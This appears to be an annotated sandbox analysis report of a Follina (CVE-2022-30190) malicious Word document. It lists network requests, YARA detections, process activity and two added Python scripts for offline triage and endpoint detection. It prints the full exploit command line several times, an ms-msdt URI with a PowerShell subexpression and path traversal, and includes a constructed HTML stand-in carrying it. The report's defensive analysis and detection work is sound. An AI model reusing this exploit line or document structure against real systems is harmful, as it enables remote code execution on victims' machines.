            Host: sqdocs.s3.eu-west-2.amazonaws.com
            Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected:
            GET /fb0f9c45-fb5f-4690-9815-e11a762d4739.html HTTP/1.1
            Accept: */*
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)
            Accept-Encoding: gzip, deflate
            Host: sqdocs.s3.eu-west-2.amazonaws.com
            If-Modified-Since: Sat, 28 May 2022 14:15:08 GMT
            If-None-Match: "bfbfa8fdda62476690c9077946372eaa"
            Connection: Keep-Alive
          Note: both requests are issued by Word while resolving the external relationship (the User-Agent ends in "ms-office; MSOffice 16"), which is what the "Uses a known web browser user agent for HTTP communication" signature refers to; the second request is a conditional re-fetch of the same page.
          Source: unknown | HTTPS traffic detected: 52.95.148.198:443 -> 192.168.2.3:49746 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 52.95.143.42:443 -> 192.168.2.3:49749 version: TLS 1.2

          System Summary

          Source: document.xml.rels, type: SAMPLE | Matched rule: Detects XML relations where an OLE object is referencing an external target in dropper OOXML documents, Author: ditekSHen
          Source: document.xml.rels, type: SAMPLE | Matched rule: SUSP_Doc_WordXMLRels_May22: date = 2022-05-30, author = Tobias Michalski, Christian Burkard, Wojciech Cieslak, description = Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-06-20, hash = 62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0
          Source: document.xml.rels, type: SAMPLE | Matched rule: INDICATOR_OLE_RemoteTemplate: author = ditekSHen, description = Detects XML relations where an OLE object is referencing an external target in dropper OOXML documents
          Source: 0000000C.00000002.568294017.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PS1_Msdt_Execution_May22: date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-08
          Source: 0000000C.00000002.559095546.0000000000718000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PS1_Msdt_Execution_May22 (metadata as above)
          Source: 0000000C.00000002.558367025.0000000000520000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PS1_Msdt_Execution_May22 (metadata as above)
          Source: 0000000C.00000002.558856728.0000000000710000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: SUSP_PS1_Msdt_Execution_May22 (metadata as above)
          Source: Process Memory Space: msdt.exe PID: 5556, type: MEMORYSTR | Matched rule: SUSP_PS1_Msdt_Execution_May22 (metadata as above)
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\fb0f9c45-fb5f-4690-9815-e11a762d4739[1].htm, type: DROPPED | Matched rule: SUSP_PS1_Msdt_Execution_May22 (metadata as above)
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\fb0f9c45-fb5f-4690-9815-e11a762d4739[1].htm, type: DROPPED | Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22: date = 2022-05-30, hash2 = 778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07, hash1 = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, modified = 2022-07-18
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3A694E5B.htm, type: DROPPED | Matched rule: SUSP_PS1_Msdt_Execution_May22 (metadata as above)
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3A694E5B.htm, type: DROPPED | Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 (metadata as above)
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3903F105.htm, type: DROPPED | Matched rule: SUSP_PS1_Msdt_Execution_May22 (metadata as above)
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\3903F105.htm, type: DROPPED | Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 (metadata as above)
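          The rule hits above point at the two artifacts that make this a Follina document: an oleObject relationship in document.xml.rels whose target is external, and an ms-msdt: URI in the HTML page Word fetches from that target. The Python script below is an added example, not part of the Joe Sandbox report, that performs the same triage offline. The .docx and the HTML it inspects are constructed stand-ins, modelled on the relationship target and the msdt.exe command line recorded elsewhere in this report; the function names are the example's own.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"

# Constructed stand-in for word/_rels/document.xml.rels of a Follina-style document. The
# oleObject relationship points at a remote HTML page instead of an embedded part; the
# target is the URL the sandbox extracted from the sample (trailing "!" included).
SAMPLE_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    f'<Relationships xmlns="{REL_NS}">'
    '<Relationship Id="rId1" Target="styles.xml" '
    'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles"/>'
    f'<Relationship Id="rId5" Type="{OLE_REL_TYPE}" TargetMode="External" '
    'Target="https://sqdocs.s3.eu-west-2.amazonaws.com/fb0f9c45-fb5f-4690-9815-e11a762d4739.html!"/>'
    '</Relationships>'
)

# Constructed stand-in for the fetched HTML, modelled on the msdt.exe command line the
# sandbox recorded. Real pages pad this with kilobytes of comments before the script.
SAMPLE_HTML = (
    '<!doctype html><html><body><script>'
    'window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param '
    '\\"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed '
    "IT_BrowseForFile=h$(Start-Process('calc'))i/../../../../../../../../../../../../../../"
    'Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\\"";'
    '</script></body></html>'
)

# The URI lives inside a JavaScript string, so escaped quotes (\") must not end the match.
MSDT_URI = re.compile(r'ms-msdt:(?:\\.|[^"\\])*', re.IGNORECASE)


def build_sample_docx() -> bytes:
    """Assemble a minimal .docx (a ZIP container) in memory so the example runs offline."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml", '<?xml version="1.0"?><w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"/>')
        z.writestr("word/_rels/document.xml.rels", SAMPLE_RELS)
    return buf.getvalue()


def find_external_relationships(docx_bytes: bytes) -> List[Dict[str, object]]:
    """List relationships in word/_rels/document.xml.rels whose TargetMode is External.
    An external oleObject target is the first link of the chain: Word fetches it on open."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if "word/_rels/document.xml.rels" not in z.namelist():
            return []
        root = ET.fromstring(z.read("word/_rels/document.xml.rels"))
    hits: List[Dict[str, object]] = []
    for rel in root.iter(f"{{{REL_NS}}}Relationship"):
        if rel.get("TargetMode", "Internal").lower() != "external":
            continue
        hits.append({"id": rel.get("Id"), "target": rel.get("Target"),
                     "ole_object": rel.get("Type") == OLE_REL_TYPE})
    return hits


def extract_subexpression(value: str) -> Optional[str]:
    """Return the body of the first $( ... ) in value, honouring nested parentheses.
    msdt hands IT_BrowseForFile to a PowerShell troubleshooter script, which evaluates the
    subexpression; the surrounding path only has to exist for msdt to proceed."""
    start = value.find("$(")
    if start < 0:
        return None
    depth = 0
    for i in range(start + 1, len(value)):
        if value[i] == "(":
            depth += 1
        elif value[i] == ")":
            depth -= 1
            if depth == 0:
                return value[start + 2:i]
    return None


def analyze_html(html: str) -> Optional[Dict[str, object]]:
    """Find an ms-msdt: URI in fetched HTML and pull apart its /id and /param arguments."""
    m = MSDT_URI.search(html)
    if not m:
        return None
    uri = m.group(0).replace('\\"', '"')  # undo the JavaScript string escaping
    pkg = re.search(r"/id\s+(\S+)", uri)
    params: Dict[str, str] = {}
    pm = re.search(r'/param\s+"([^"]*)"', uri)
    if pm:
        # Split only in front of a KEY= token so values containing spaces stay intact.
        for token in re.split(r"\s+(?=\w+=)", pm.group(1)):
            key, _, val = token.partition("=")
            params[key] = val
    browse = params.get("IT_BrowseForFile", "")
    package = pkg.group(1) if pkg else None
    return {"uri": uri, "package": package, "params": params,
            "powershell": extract_subexpression(browse),
            "traversal": "/../" in browse,
            "follina": package == "PCWDiagnostic" and "$(" in browse}


if __name__ == "__main__":
    for rel in find_external_relationships(build_sample_docx()):
        print("external relationship:", rel)
    print("ms-msdt analysis:", analyze_html(SAMPLE_HTML))
```

          In a real triage the HTML is taken from the INetCache copies listed above rather than re-fetched, so the hosting bucket is not tipped off and the analysis does not depend on the page still being online.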
          Source: DiagPackage.dll.12.dr | Static PE information: No import functions for PE file found
          Source: DiagPackage.dll.mui.12.dr | Static PE information: No import functions for PE file found
          Source: DiagPackage.dll.12.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST (3 such resources)
          Note: DiagPackage.dll and its .mui are the resource files of the PCWDiagnostic troubleshooting pack that msdt.exe writes to C:\Windows\Temp\SDIAG_* (listed under Persistence and Installation Behavior). A DLL that carries only icon resources and imports nothing is expected there; the empty import table is not evidence of packing.
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE | Section loaded: sfc.dll
          Source: icRTA4gcSe.docx | Virustotal: Detection: 47%
          Source: icRTA4gcSe.docx | Metadefender: Detection: 28%
          Source: icRTA4gcSe.docx | ReversingLabs: Detection: 61%
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
          Source: unknown | Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, command line: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process created: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, command line: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Process created: C:\Windows\SysWOW64\msdt.exe, command line: C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Start-Process('calc'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO
          Note: this is the CVE-2022-30190 command line. Word launches the ms-msdt: protocol handler from the fetched HTML; the $( ) inside IT_BrowseForFile is evaluated as PowerShell by the PCWDiagnostic troubleshooter, and the ../ chain makes the value resolve to the existing Windows\System32\mpsigstub.exe so msdt's file-exists check passes. Here the payload only starts calc, which matches the calc.exe and Calculator.exe starts below.
          Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5pliokiz\5pliokiz.cmdline
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES329A.tmp" "c:\Users\user\AppData\Local\Temp\5pliokiz\CSCEC77468AE1504898A4CAD2F9B69D7F46.TMP"
          Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\h34ip5a5\h34ip5a5.cmdline
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES48B3.tmp" "c:\Users\user\AppData\Local\Temp\h34ip5a5\CSC3AC1B580675E4658855F5C63BDA7A47F.TMP"
          Source: unknown | Process created: C:\Windows\SysWOW64\calc.exe, command line: "C:\Windows\system32\calc.exe"
          Source: unknown | Process created: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exe, command line: "C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exe" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca
          Source: unknown | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\v2wr4cux\v2wr4cux.cmdline
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEEE6.tmp" "c:\Users\user\AppData\Local\Temp\v2wr4cux\CSCB2D03E94AB5B4EC2978640D7F4BF95DE.TMP"
          Source: C:\Windows\SysWOW64\msdt.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{88d96a05-f192-11d4-a65f-0040963251e5}\InProcServer32
          Source: icRTA4gcSe.docx.LNK.0.dr | LNK file: ..\..\..\..\..\Desktop\icRTA4gcSe.docx
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\{993656D6-8265-43CF-8062-6407D43136B8} - OProcSessId.dat
          Source: classification engine | Classification label: mal92.expl.evad.winDOCX@16/30@2/2
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File read: C:\Users\desktop.ini
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll (9 identical entries)
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File written: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE | File read: C:\Windows\System32\drivers\etc\hosts (2 identical entries)
          Source: C:\Windows\SysWOW64\msdt.exe | Automated click: Next (29 identical entries)
          Source: C:\Windows\SysWOW64\msdt.exe | File opened: C:\Windows\SysWOW64\MSFTEDIT.DLL
          Source: Window Recorder | Window detected: More than 3 window changes detected
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE | File opened: C:\Windows\SysWOW64\MSVCR100.dll
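          The process activity recorded in this section (WINWORD.EXE starting msdt.exe with an ms-msdt: URI, csc.exe then compiling .cmdline response files out of the user's Temp directory, and finally calc.exe) is what endpoint telemetry shows for this sample. The script below is an added example, not part of the Joe Sandbox report, of detection logic a SOC could run over process-creation events: it scores msdt.exe starts on the command-line features that the SUSP_PS1_Msdt_Execution_May22 hits above key on, and correlates a later csc.exe compile on the same host with them. The event records are constructed; only the msdt.exe and csc.exe command lines are taken from this report, and the host names, timestamps, benign control events and field layout are assumptions.

```python
import re
from datetime import datetime, timedelta
from typing import Dict, List

# Constructed process-creation events in a Sysmon-style shape. The msdt.exe and csc.exe
# command lines are the ones the sandbox recorded for this sample; host names, timestamps
# and the two benign control events are assumptions made for this example. The parent of
# csc.exe is left as "unknown", as the report lists it.
EVENTS: List[Dict[str, str]] = [
    {"ts": "2022-08-08T10:00:00", "host": "ws01", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE",
     "cmdline": r'"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding'},
    {"ts": "2022-08-08T10:00:07", "host": "ws01",
     "parent": r"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE",
     "image": r"C:\Windows\SysWOW64\msdt.exe",
     "cmdline": r'''"C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Start-Process('calc'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO"'''},
    {"ts": "2022-08-08T10:00:19", "host": "ws01", "parent": "unknown",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5pliokiz\5pliokiz.cmdline"'},
    # Benign control: the same csc.exe pattern on a build host with no msdt.exe activity.
    {"ts": "2022-08-08T10:00:20", "host": "build02", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "cmdline": r'csc.exe /noconfig /fullpaths @"C:\Users\dev\AppData\Local\Temp\abc123\abc123.cmdline"'},
    # Benign control: msdt.exe started from the Control Panel, no ms-msdt: URI.
    {"ts": "2022-08-08T10:05:00", "host": "ws03", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msdt.exe",
     "cmdline": r'"C:\Windows\System32\msdt.exe" -id NetworkDiagnosticsWeb'},
]

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
PARENT_REASON = "spawned by an Office application"
MSDT_URI = re.compile(r"\bms-msdt:", re.IGNORECASE)
# A PowerShell subexpression inside the file-browse parameter is the injection point:
# msdt hands IT_BrowseForFile to a PowerShell troubleshooter script that evaluates it.
INJECTED_PS = re.compile(r'IT_BrowseForFile=[^\s"]*\$\(', re.IGNORECASE)
# csc.exe compiling a response file from a user temp directory is what PowerShell Add-Type
# produces; on its own it is common and benign, so it is only used for correlation.
TEMP_CMDLINE = re.compile(r'@"?[A-Za-z]:\\Users\\[^"\s]*\\AppData\\Local\\Temp\\[^"\s]*\.cmdline', re.IGNORECASE)


def image_name(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def msdt_reasons(ev: Dict[str, str]) -> List[str]:
    """Reasons an msdt.exe start looks like CVE-2022-30190 abuse; empty for any other image."""
    if image_name(ev["image"]) != "msdt.exe":
        return []
    cmd, reasons = ev["cmdline"], []
    if MSDT_URI.search(cmd):
        reasons.append("ms-msdt: URI on the command line")
    if INJECTED_PS.search(cmd):
        reasons.append("$( ) subexpression inside IT_BrowseForFile")
    if "/../" in cmd:
        reasons.append("directory traversal inside IT_BrowseForFile")
    if image_name(ev["parent"]) in OFFICE_IMAGES:
        reasons.append(PARENT_REASON)
    return reasons


def scan(events: List[Dict[str, str]], window_seconds: int = 120) -> List[Dict[str, object]]:
    """One alert per msdt.exe start with a suspicious command line, plus one per csc.exe
    compile of a user-temp .cmdline that follows such a start on the same host in time."""
    alerts: List[Dict[str, object]] = []
    last_msdt: Dict[str, datetime] = {}  # host -> time of the last suspicious msdt.exe
    for ev in sorted(events, key=lambda e: e["ts"]):
        t = datetime.fromisoformat(ev["ts"])
        reasons = msdt_reasons(ev)
        if any(r != PARENT_REASON for r in reasons):  # command-line evidence, not parent alone
            last_msdt[ev["host"]] = t
            alerts.append({"rule": "msdt_follina", "host": ev["host"], "ts": ev["ts"], "reasons": reasons})
        elif image_name(ev["image"]) == "csc.exe" and TEMP_CMDLINE.search(ev["cmdline"]):
            seen = last_msdt.get(ev["host"])
            if seen is not None and timedelta(0) <= t - seen <= timedelta(seconds=window_seconds):
                gap = int((t - seen).total_seconds())
                alerts.append({"rule": "csc_after_msdt", "host": ev["host"], "ts": ev["ts"],
                               "reasons": [f"csc.exe compiled a user-temp .cmdline {gap}s after suspicious msdt.exe"]})
    return alerts


if __name__ == "__main__":
    for a in scan(EVENTS):
        print(a["ts"], a["host"], a["rule"], "; ".join(a["reasons"]))
```

          The csc.exe rule is deliberately not fired on its own: Add-Type compiles from a user Temp directory are routine on developer and administration hosts, and the build02 control event shows the correlation leaving them alone. The parent check is kept as supporting evidence rather than a trigger, because the sandbox recorded msdt.exe under WINWORD.EXE but the same URI can be launched from a browser or a shortcut.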

          Persistence and Installation Behavior

          Source: document.xml.rels | Extracted files from sample: https://sqdocs.s3.eu-west-2.amazonaws.com/fb0f9c45-fb5f-4690-9815-e11a762d4739.html! (the trailing "!" is part of the Target attribute as stored in the document, not a typo)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\h34ip5a5\h34ip5a5.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\5pliokiz\5pliokiz.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\v2wr4cux\v2wr4cux.dll
          Source: C:\Windows\SysWOW64\msdt.exe | File created: C:\Windows\Temp\SDIAG_d9af2b63-3a79-4ece-a7db-529be45f68a7\DiagPackage.dll (2 identical entries)
          Source: C:\Windows\SysWOW64\msdt.exe | File created: C:\Windows\Temp\SDIAG_d9af2b63-3a79-4ece-a7db-529be45f68a7\en-US\DiagPackage.dll.mui (2 identical entries)
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE | Registry key monitored for changes: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE; Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE; Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\msdt.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exe; Process information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exe TID: 6580; Thread sleep count: 784 > 30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\h34ip5a5\h34ip5a5.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\5pliokiz\5pliokiz.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe; Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\v2wr4cux\v2wr4cux.dll
          Source: C:\Windows\SysWOW64\msdt.exe; Window / User API: threadDelayed 1712
          Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exe; Window / User API: threadDelayed 784
          Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE; Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Start-Process('calc'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES329A.tmp" "c:\Users\user\AppData\Local\Temp\5pliokiz\CSCEC77468AE1504898A4CAD2F9B69D7F46.TMP"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES48B3.tmp" "c:\Users\user\AppData\Local\Temp\h34ip5a5\CSC3AC1B580675E4658855F5C63BDA7A47F.TMP"
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe; Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEEE6.tmp" "c:\Users\user\AppData\Local\Temp\v2wr4cux\CSCB2D03E94AB5B4EC2978640D7F4BF95DE.TMP"
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE; Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb VolumeInformation
          Source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE; Queries volume information: C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb VolumeInformation
          Source: C:\Windows\SysWOW64\msdt.exe; Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00116~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exe; Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
          Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exe; Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
          Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exe; Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
          Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exe; Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1712.10601.0_x64__8wekyb3d8bbwe\Calculator.exe; Queries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformation
          Source: C:\Windows\SysWOW64\msdt.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          ATT&CK matrix by tactic (number in parentheses = matching signatures):
          Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
          Execution: Command and Scripting Interpreter (1); Exploitation for Client Execution (23); At (Linux); At (Windows); Cron; Launchd
          Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
          Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
          Defense Evasion: Masquerading (11); Virtualization/Sandbox Evasion (1); Process Injection (11); DLL Side-Loading (1); Software Packing; Steganography
          Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
          Discovery: Query Registry (1); Virtualization/Sandbox Evasion (1); Application Window Discovery (1); Remote System Discovery (1); File and Directory Discovery (2); System Information Discovery (13)
          Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
          Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
